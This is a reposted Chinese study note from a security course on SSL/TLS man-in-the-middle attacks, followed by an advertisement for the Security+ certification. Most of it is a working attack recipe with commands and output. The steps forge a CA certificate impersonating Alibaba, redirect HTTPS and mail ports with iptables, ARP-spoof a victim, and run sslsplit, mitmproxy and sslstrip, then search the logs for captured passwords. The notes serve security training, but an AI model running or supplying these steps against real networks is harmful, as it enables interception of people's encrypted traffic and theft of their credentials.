当前位置:   article > 正文

【安全牛学习笔记】SSL、TLS中间人攻击_tls中间人攻击 iptables端口转发

tls中间人攻击 iptables端口转发

╋━━━━━━━━━━━━━━━━━╋

┃SSL中间人攻击                                    ┃

┃攻击者位于客户端和服务器通信链路中┃

┃    ARP                                                  ┃

┃    DHCP                                               ┃

┃    修改网关                                           ┃

┃    修改DNS                                           ┃

┃    修改HOSTS                                      ┃

┃    ICMP、STP、OSPF                         ┃

┃加密流量                                               ┃

╋━━━━━━━━━━━━━━━━━╋

╋━━━━━━━━━━━━━━━━━━━━━━━╋

┃SSL中间人攻击                                                          ┃

┃攻击的前提                                                                 ┃

┃    客户端已经信任伪造证书颁发机构                         ┃

┃    攻击者控制了核发证书颁发机构                             ┃

┃    客户端程序禁止了显示证书错误告警信息              ┃

┃    攻击者已经控制客户端,并强制其信任伪造证书   ┃

╋━━━━━━━━━━━━━━━━━━━━━━━╋

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

┃SSL/TLS中间人攻击                                                                               ┃

┃SSLsplit                                                                                                  ┃

┃    透明SSL/TLS中间人攻击工具                                                            ┃

┃    对客户端伪装服务器,对服务器伪装成普通客户端                            ┃

┃    伪装服务器需要伪造证书                                                                   ┃

┃    支持SSL/TLS加密的SMTP、POP3、FTP等通信中间人攻击           ┃

┃利用openssl生成证书私钥                                              

┃    openssl genrsa -out ca.key 2048                                                      ┃

┃利用私钥签名生成证书                                                                          ┃

┃    openssl req -new -x509 -days 1096 -key ca.key -out ca.crt              ┃

 ╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

root@R:~# openssl genrsa -out ca.key 2048

root@R:~# cat ca.key

root@R:~# openssl req -new -x509 -days 1096 -key ca.key -out ca.crt

you are about to be asked to enter information that will be incorporated

into your certificate request.

What you are about en enter is what is called a Distinguished Name or a DN.

There are quite a few fields but you can leave some blank

For some field there will be a default value.

-----

Country Name (2 letter code) [AU]:CN

State or Province Name (full name) [Some-State]:Hangzhou

Locality Name (eg, city) []:zhejiang

Organization Name (eg, company) [Internet Widgits Pty Ltd]:Alibaba

Organization Unit Name (eg, section) []:ALI

Common Name (e.g. server FQDN or YOUR name) []:ALBABA

Email Address []:admin@alibaba.com

root@R:~# ls

ca.crt  Desktop    Downloads  Pictures  Templates

ca.key  Documents  Music      Public    Videos

root@R:~# cat ca.crt

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

┃SSL/TLS中间人攻击                                                                                                                              ┃

┃启动路由                                                                                                                                                ┃

┃    sysctl -w net.ipv4.ip_forward=1                                                                                                         ┃

┃Iptables端口转发规则                                                                                                                            ┃

┃    iptables -t nat -F                                                                                                                                ┃

┃    iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080                             ┃

┃    iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443                           ┃

┃    iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443 #MSA                 ┃

┃    iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443 #SMTPS            ┃

┃    iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443 #IMAPS             ┃

┃    iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443 #POP3S            ┃

┃    iptables -t nat -L                                                                                                                                 ┃

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

root@R:~# sysctl -w net.ipv4.ip_forward=1 ───────┐

                                                        │

root@R:~# cat /proc/sys/net/ipv4/ip_forward             ├→  效果一样   

                                                        │

root@R:~# echo 1 > /proc/sys/net/ipv4/ip_forward────┘

root@R:~# iptables -L

Chain INPUT (policy ACCEPT)

target     port opt source             destination

chain FORWARD (policy ACCEPT)

target     port opt source             destination

chain OUTPUT (policy ACCEPT)

target     port opt source             destination

root@R:~# iptables -t nat -L

Chain PREROUTING (policy ACCEPT)

target     port opt source             destination

chain INPUT (policy ACCEPT)

target     port opt source             destination

chain OUTPUT (policy ACCEPT)

target     port opt source             destination

chain POSTROUTING (policy ACCEPT)

target     port opt source             destination

root@R:~# iptables -t nat -F  //清空所有规则

root@R:~# netstat -pantu | grep :80

tcp        0      0 127.0.0.1:80           0.0.0.0:*            LISTEN   771/gsad

tcp        0      0 192.168.1.117:55744    106.10.106.140:80    TIME_WAIT   -

root@R:~# openvas-stop

Stooping OpenVas Services

root@R:~# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080

root@R:~# iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443

root@R:~# iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443 #MSA

root@R:~# iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443 #SMTPS

root@R:~# iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443 #IMAPS

root@R:~# iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443 #POP3S

root@R:~# iptables -t nat -L

Chain RTEROUTING (policy ACCEPT)

target     prot opt source               destination

REDIRECT   tcp  --  anywhere             anywhere             tcp dpt:http redir ports 8080

REDIRECT   tcp  --  anywhere             anywhere             tcp dpt:https redir ports 8443

REDIRECT   tcp  --  anywhere             anywhere             tcp dpt:submission redir ports 8443

REDIRECT   tcp  --  anywhere             anywhere             tcp dpt:urd redir ports 8443

REDIRECT   tcp  --  anywhere             anywhere             tcp dpt:imaps redir ports 8443

REDIRECT   tcp  --  anywhere             anywhere             tcp dpt:pop3s redir ports 8443

Chain INPUT (policy ACCEPT)

arget     prot opt source               destination

chain OUTPUT (policy ACCEPT)

target     port opt source             destination

chain POSTROUTING (policy ACCEPT)

target     port opt source             destination

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

┃SSL/TLS中间人攻击                                                    

┃Arp欺骗                                                                                                                                                  ┃

┃    arpspoof -i eth0 -t 1.1.1.2 -r 1.1.1.1                                                                                                    ┃

┃启动SSLsplit                                                                                                                                           ┃

┃    mkdir -p test/logdir                                                                                                                              ┃

┃    sslsplit -D -l connect.log -j /root/test -S logdir/ -K ca.key -c ca.crt ssl 0.0.0.0                                     ┃

┃    8443 tcp 0.0.0.0 8080                                                                                                                         ┃

┃被害者访问taobao、baidu、mail.163.com                                                                                             ┃

┃查看日志和浏览器证书及证书报错信息                                                                                                  ┃

┃安装服务器跟帧数之后再次访问                                                                                                            ┃

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

192.168.1.1      14-75-90-21-4f-56

root@R:~# arpspoof -i eth0 -t 192.168.1.118 -r 192.168.1.1

root@R:~# sslsplit -D -l connect.log -j /root/test -S logdir/ -K ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

root@R:~# mkdir -p test/logdir

root@R:~# ls

ca.crt  Desktop    Downloads  pictures  Templates  Videos

ca.key  Documents  Music      Public    test

root@R:~# cd test

root@R:~/test# ls

logdir

root@R:~/test# cd

root@R:~# cd test

root@R:~/test# cd logdir/

root@R:~/test/logdir# ls

root@R:~/test/logdir# grep 123123 *

root@R:~/test/logdir# grep baidu *

root@R:~/test/logdir# cd

root@R:~# cp ca.crt /media/sf_D_DRIVE/

root@R:~# cd test/logdir/

root@R:~/test/logdir# grep 333333 *

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

┃SSL/TLS中间人攻击                                                                                                                              ┃

┃iptables端口转发规则                                                                                                                            ┃

┃    iptables -t nat -F                                                                                                                                ┃

┃    iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to- port 8080                   ┃

┃    iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to- port 8080                 ┃

┃Mitmproxy                                                                                                                                             ┃

┃    mitmproxy -T --host -w mitmproxy.log                                                                                               ┃

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

root@R:~# iptables -t nat -L

Chain RTEROUTING (policy ACCEPT)

target     prot opt source               destination

REDIRECT   tcp  --  anywhere             anywhere             tcp dpt:http redir ports 8080

REDIRECT   tcp  --  anywhere             anywhere             tcp dpt:https redir ports 8443

REDIRECT   tcp  --  anywhere             anywhere             tcp dpt:submission redir ports 8443

REDIRECT   tcp  --  anywhere             anywhere             tcp dpt:urd redir ports 8443

REDIRECT   tcp  --  anywhere             anywhere             tcp dpt:imaps redir ports 8443

REDIRECT   tcp  --  anywhere             anywhere             tcp dpt:pop3s redir ports 8443

Chain INPUT (policy ACCEPT)

arget     prot opt source               destination

chain OUTPUT (policy ACCEPT)

target     port opt source             destination

chain POSTROUTING (policy ACCEPT)

target     port opt source             destination

root@R:~# iptables -t nat -F

root@R:~# iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to- port 8080

root@R:~# iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to- port 8080

root@R:~# mitmproxy -T --host -w mitmproxy.log

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

┃SSL/TLS中间人攻击                                                                    ┃

┃SSLstrip                                                                                       ┃

┃    与前两种工具不同,将客户端到中间人之间的流量变为明文   ┃

┃    sslstrip -l 8080                                                                         ┃

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

root@R:~# sslstrip -l 8080

root@R:~# iptables -t nat -L

Chain RTEROUTING (policy ACCEPT)

target     prot opt source               destination

REDIRECT   tcp  --  anywhere             anywhere             tcp dpt:http redir ports 8080

REDIRECT   tcp  --  anywhere             anywhere             tcp dpt:https redir ports 8080

Chain INPUT (policy ACCEPT)

arget     prot opt source               destination

chain OUTPUT (policy ACCEPT)

target     port opt source             destination

chain POSTROUTING (policy ACCEPT)

target     port opt source             destination

该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂


Security+认证为什么是互联网+时代最火爆的认证?

      牛妹先给大家介绍一下Security+


        Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。

       通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。

Security+认证如此火爆的原因?  

       原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。

      目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。

       原因二: IT运维人员工作与翻身的利器。

       在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。

        原因三:接地气、国际范儿、考试方便、费用适中!

CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。

        在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。


声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/2023面试高手/article/detail/430332
推荐阅读
相关标签
  

闽ICP备14008679号